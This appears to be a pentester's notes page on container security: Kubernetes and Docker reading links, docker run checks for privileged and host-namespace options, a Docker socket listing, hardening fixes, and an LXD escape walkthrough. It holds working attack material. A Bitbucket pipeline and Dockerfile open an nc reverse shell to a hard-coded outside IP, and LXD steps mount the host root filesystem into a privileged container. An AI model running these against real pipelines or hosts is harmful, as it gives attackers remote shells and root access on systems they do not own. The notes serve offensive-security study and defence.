Link to this headingContainers

Link to this headingKubernetes

Kubernetes Pentest Methodology Part 1
Kubernetes Pentest Methodology Part 2
Kubernetes Pentest Methodology Part 3

Bad Pods: Kubernetes Pod Privilege Escalation

The Kubenomicon: Kubernetes from an offensive perspective

Link to this headingDocker

Escaping Namespaces
The Dangers of Docker.sock
Abusing Privileged and Unprivileged Linux Containers
Understanding and Hardening Linux Containers
A light-weight process isolation tool
Docker: Security Myths
Seccomp security profiles for Docker
Root your Docker host in 10 seconds for fun and profit

Source

Does the Docker Deamon have an authorization module?
- check /var/lib/authz-broker/
Does the Docker Deamon use User Namespaces?
Check for Symbolic Link Bypassing volume mounting

Check for protections inside a container:

>>> sudo docker run --rm --privileged -v `pwd`:/host -it node:latest /bin/bash root@acf8b3edec59:/# /host/ami Container Runtime: docker Has Namespaces: pid: true user: false AppArmor Profile: unconfined Capabilities: BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read Seccomp: disabled

Check for network namespacing:

>>> sudo docker run --rm --net host -v `pwd`:/host -it node:latest /bin/bash root@lupin:/#

Check For Volume Mounting:

>>> sudo docker run --rm --net host --volume /:/rootfs -v `pwd`:/host -it node:latest /bin/bash root@lupin:/#

Check For device mapping:

sudo docker run --rm --device /:/devhost -v `pwd`:/host -it node:latest /bin/bash

Check for disabling Security Options:

>>> sudo docker run --rm --security-opt seccomp=unconfined -v `pwd`:/host -it node:latest /bin/bash root@73b3de272685:/# exit

Check for disabling apparmor Security Options:

>>> sudo docker run --rm --security-opt apparmor=unconfined -v `pwd`:/host -it node:latest /bin/bash root@edb17ce6126a:/# exit

Check for setting Custom Kernel parameters:

>>> sudo docker run --rm --sysctl net.ipv4.ip_forward=1 -v `pwd`:/host -it node:latest /bin/bash root@d4e604c9db9a:/#

Check for username namespacing:

>>> sudo docker run --rm --userns host -v `pwd`:/host -it node:latest /bin/bash root@c22b43ed3c91:/# exit >>> sudo docker run --rm --uts host -v `pwd`:/host -it node:latest /bin/bash root@c22b43ed3c91:/# exit

Check for additional kernel syscalls:

>>> sudo docker run --rm --cap-add ALL -v `pwd`:/host -it node:latest /bin/bash root@4fbd268aeb7d:/#

Check for IPC namespacing:

>>> sudo docker run --rm --ipc host -v `pwd`:/host -it node:latest /bin/bash root@15259ffde075:/#

Check for Process namespacing:

>>> sudo docker run --rm --pid host -v `pwd`:/host -it node:latest /bin/bash root@15259ffde075:/#

Check for Root user namespacing:

>>> sudo docker run --rm --map-root-user -v `pwd`:/host -it node:latest /bin/bash root@15259ffde075:/#

Check for Mounting:

>>> sudo docker run --rm --mount /:/rootfs -v `pwd`:/host -it node:latest /bin/bash root@15259ffde075:/#

Link to this headingReverse Shell through Docker

bitbucket-pipelines.yml:

image: name: atlassian/default-image:latest pipelines: default: - step: script: - ln -s / $BITBUCKET_CLONE_DIR/ln - curl -oDockerfile https://gist.github.com/staaldraad/b805639cf44363692f13493f651c5689/raw/f8f65876cd464611ad0f7d365a9cf36a950fde36/Dockerfile - docker build . -t xyz - docker run -i --rm -v $BITBUCKET_CLONE_DIR/ln/:/ln xyz:latest services: - docker caches: - docker

Dockerfile:

FROM docker RUN apk update RUN echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 139.59.42.102 443 >/tmp/f" > /pew.sh RUN chmod +x /pew.sh ENTRYPOINT /pew.sh

Link to this headingDocker Sockets

Docker Socket Locations:

>>> sudo ls -al /var/run/docker/containerd total 8 drwx------ 3 root root 160 Jan 28 18:00 . drwx------ 8 root root 180 Jan 28 12:53 .. srw-rw---- 1 root root 0 Jan 28 12:52 containerd-debug.sock -rw-r----- 1 root root 6 Jan 28 12:52 containerd.pid srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock.ttrpc -rw------- 1 root root 706 Jan 28 12:52 containerd.toml drwx--x--x 4 root root 80 Jan 28 12:52 daemon >>> sudo ls -al /var/run/doc*.* -rw-r--r-- 1 root root 6 Jan 28 12:52 /var/run/docker.pid srw-rw---- 1 root docker 0 Jan 28 12:52 /var/run/docker.sock

Link to this headingFixes

Use User namespaces:

  • This prevents --pid host, --device, --ipc host,

Prevent removing User Namespaces through the authz plugin:

  • This can be checked by using the --userns host parameter

Prevent Adding unnecessary Capabilities:

  • This allows access to more Kernel functions that may be restricted otherwise --cap-add ALL

Prevent seccomp bypass through the authz plugin:

  • --security-opt seccomp=unconfined

Prevent apparmor bypass through the authz plugin:

  • --security-opt apparmor=unconfined

Link to this headingLXD

Build the LXD Image on other Machine:

git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder ./build-alpine >>> ls

Import and Init Machine:

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage #Show that the image was inported lxc image list #Add privlaged container lxc init myimage ignite -c security.privileged=true #Mount the Root file system into the continer lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true #Start Continaer lxc start ignite #Start shell in the container lxc exec ignite /bin/sh